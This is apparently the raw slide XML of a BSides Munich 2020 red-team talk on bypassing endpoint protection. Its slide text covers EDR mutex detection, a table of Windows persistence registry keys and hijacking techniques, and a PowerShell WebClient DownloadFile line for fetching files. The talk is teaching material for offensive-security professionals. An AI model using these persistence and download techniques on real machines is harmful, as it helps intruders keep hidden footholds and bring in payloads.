Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide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Layout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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2DD21-E014-E64C-9A2D-2F6B8F0C7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174" y="1122363"/>
            <a:ext cx="11163652" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Art of bypassing endpoint protections for red teaming engagements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B8E445-08AC-0949-B968-D558BD10C2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4361" y="3758155"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jameel Nabbo / Eslam Reda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSides Munich 2020</a:t>
            </a:r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6E935B-7BAA-DC4D-9A27-8E895050B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4" y="4429919"/>
            <a:ext cx="4262417" cy="228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6E68FD9-598A-7A46-B635-1AD5391FBF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0611" y="4827352"/>
            <a:ext cx="2274778" cy="1543124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2001309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C90C9-E690-0D42-8AA9-FC64FAB43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Advanced EDR Mutex detection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2895AF-21FB-8946-A984-57241883D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9363" y="3413566"/>
            <a:ext cx="7505229" cy="126636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85FF0E6-1A81-CC4B-A3B1-334D58B204BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797170" y="5908197"/>
            <a:ext cx="100525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FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ATT Aleck Sans"/>
              </a:rPr>
              <a:t>It’s used in concurrent programming to allow multiple program threads to share the same resource. The reason is to prevent infecting the machine multiple times with the same malware.</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="Alien Emoji Png Transparent Icon 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CEAA2D6-4D1D-154D-95A0-629D0143A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70" y="1416908"/>
            <a:ext cx="794238" cy="80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8659B6-CD2C-A84F-8DE9-809D20CE7363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539027" y="2232848"/>
            <a:ext cx="1389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Malware.exe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AB92F98-326C-AD4D-A959-79B873AC6A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147683" y="1819054"/>
            <a:ext cx="2031023" cy="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Double Brace 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8897C6DE-C1F6-7144-8535-FDE16843278B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4382429" y="1333399"/>
            <a:ext cx="2319454" cy="947109"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair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98B80A-23B6-8A4D-A0F6-0D92278FF2F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4570062" y="1373278"/>
            <a:ext cx="19441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Generate Mutex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check if another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instance is running</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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06E8C142-6F48-4E4E-B08E-4702990BC711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889516" y="1770150"/>
            <a:ext cx="1329282" cy="1444552"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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5300FB7-C057-F349-A2A9-71EEA8283570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2783197" y="4235151"/>
            <a:ext cx="1011148" cy="0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0554F0FF-07D7-C94C-8903-CA78F07F5960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518661" y="4046747"/>
            <a:ext cx="1895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Get the MD5 hash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488B4B1-38E0-474E-B017-044BDCF1E277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2539134" y="2280508"/>
            <a:ext cx="0" cy="2723198"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1016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Explosion 1 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27168F37-B62A-2549-BB54-318D6FF1A172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1814725" y="4817547"/>
            <a:ext cx="1448820" cy="1090650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09667B7-CB87-8847-BB60-AF3FCAD9B497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981033" y="5141136"/>
            <a:ext cx="111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</a:rPr>
              <a:t>Detected!</a:t>
            </a:r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F80E3E24-DFBA-2646-BC27-7E14125BE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0804" y="6029807"/>
            <a:ext cx="1208051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3AEBB07-6CFA-D644-BA7A-3EE3785EAC0C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="107640" y="1966680"/>
              <a:ext cx="6346080" cy="323388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3AEBB07-6CFA-D644-BA7A-3EE3785EAC0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280" y="1957320"/>
                <a:ext cx="6364800" cy="3252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833799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C6219-587B-0745-993E-9895FCDBE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Fun with Mutex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194EA5-AED8-8340-8589-E56F2D134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88" y="1268414"/>
            <a:ext cx="6096000" cy="24506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6C6DE1-9E6A-184C-A74E-0494798FF9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322940" y="4609461"/>
            <a:ext cx="1154611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If you are using a named mutex to limit your application to a single instance,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>malicious user can create this mutex before you do and prevent your application from starting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To prevent this situation, create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>randomly named mutex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and store the name so that it can only be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> obtained by an authorized user. Alternatively, you can use a file for this purpose. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To limit your application to one instance per user, create a locked file in the user's profile directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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AC3C9E-0064-954C-8A92-92A1773FB9FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133815" y="4005966"/>
            <a:ext cx="1099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3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-gb/windows/win32/api/synchapi/nf-synchapi-createmutexa?redirectedfrom=MSDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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1FA2F76-F3D0-454F-8A8A-7CEABBC9A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3885" y="6147848"/>
            <a:ext cx="1141413" cy="61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A90368-A184-D440-99D3-7F42B5599914}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="336600" y="-360"/>
              <a:ext cx="4289400" cy="12218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A90368-A184-D440-99D3-7F42B559991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27240" y="-9720"/>
                <a:ext cx="4308120" cy="124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04950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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2E961F1-4A28-4A5F-BBD4-6E400E5E6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72357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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F57BEA8-497D-4AA8-8A18-BDCD696B2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68596"/>
            <a:ext cx="12192000" cy="173555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2BBCA4-1371-2F4C-9BEA-CF4DEA806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89439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Malware persistence techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3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30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30" name="Straight Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A82415D3-DDE5-4D63-8CB3-23A5EC581B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24400" y="1479733"/>
            <a:ext cx="2743200" cy="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D7193FB-6AE6-4B3B-8F89-56B55DD63B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 bwMode="white">
          <a:xfrm>
            <a:off x="0" y="2201402"/>
            <a:ext cx="12188824" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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CD0E4A7-817B-F342-AB64-974C64A64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1380405"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2200388"/>
          <a:ext cx="12188823" cy="4720460"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{3C2FFA5D-87B4-456A-9821-1D502468CF0F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2780282">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2817754985"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="9408541">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="327402222"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="409664">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" b="0" cap="all" spc="150">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Run/RunOnce</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1000" b="0" cap="all" spc="150">
                        <a:solidFill>
                          <a:schemeClr val="bg1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0" cap="all" spc="150">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Registry Keys</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1000" b="0" cap="all" spc="150">
                        <a:solidFill>
                          <a:schemeClr val="bg1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solidFill>
                      <a:srgbClr val="5053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35368"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>BootExecute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Key</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKLM\SYSTEM\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CurrentControlSet</a:t>
                      </a:r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\Control\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>hivelist</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL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943310"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Userinit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Key</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Winlogon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL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443893"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Explorer.exe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc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NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Winlogon</a:t>
                      </a:r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\Shell</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL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1170825"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="833294">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Startup</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Keys</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</a:t>
                      </a:r>
                    </a:p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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</a:t>
                      </a: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607434"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406"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rgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Services</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CurrentControlSet</a:t>
                      </a:r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\services</a:t>
                      </a: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2415892"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406"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rgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Browser Helper Objects</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects</a:t>
                      </a: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1452718"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AppInit_DLLs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AppInit_DLLs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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3871512"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406"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rgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>File Association</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_LOCAL_MACHINE\Software\Classes</a:t>
                      </a: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370897"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DLL Search Order Hijacking</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CurrentControlSet</a:t>
                      </a:r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\Control\Session Manager\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>KnownDLLs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1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35282"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379406"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rgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Shortcut Hijacking</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-NL" sz="1200" cap="none" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRP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cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> MBR, COM object hijacking</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="82311" marR="82311" marT="82311" marB="8231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000000">
                        <a:alpha val="784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0680078"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD01F0FC-BCF5-124F-837F-0755C788CC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4773" y="6080055"/>
            <a:ext cx="1454050" cy="77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031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29B2F-5A87-7943-A043-6C5DDE93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46" y="37627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Regular techniques using PowerShell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D53B22-F88B-004A-A0E8-FDED61002AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410237" y="2373895"/>
            <a:ext cx="8399655" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5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en-GB" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005CC5"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>New-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D73A49"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>,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24292E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>$out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="28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414189-E915-8740-A6A2-8CBA094FEF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4610064" y="3819293"/>
            <a:ext cx="635619" cy="741556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Eyes – Surprise">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F658242-AC35-6F4F-A098-B5AA257D76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06462949"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6995370" y="303504"/>
              <a:ext cx="4857649" cy="259361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857649" cy="2593611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </am3d:spPr>
                  <am3d:camera>
                    <am3d:pos x="0" y="0" z="545899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38394" d="1000000"/>
                    <am3d:preTrans dx="-82030" dy="-110215693" dz="-25245148"/>
                    <am3d:scale>
                      <am3d:sx n="1000000" d="1000000"/>
                      <am3d:sy n="1000000" d="1000000"/>
                      <am3d:sz n="1000000" d="1000000"/>
                    </am3d:scale>
                    <am3d:rot ax="1633613" ay="-1351313" az="-66891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01118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Eyes – Surprise">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F658242-AC35-6F4F-A098-B5AA257D7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95370" y="303504"/>
                <a:ext cx="4857649" cy="2593611"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
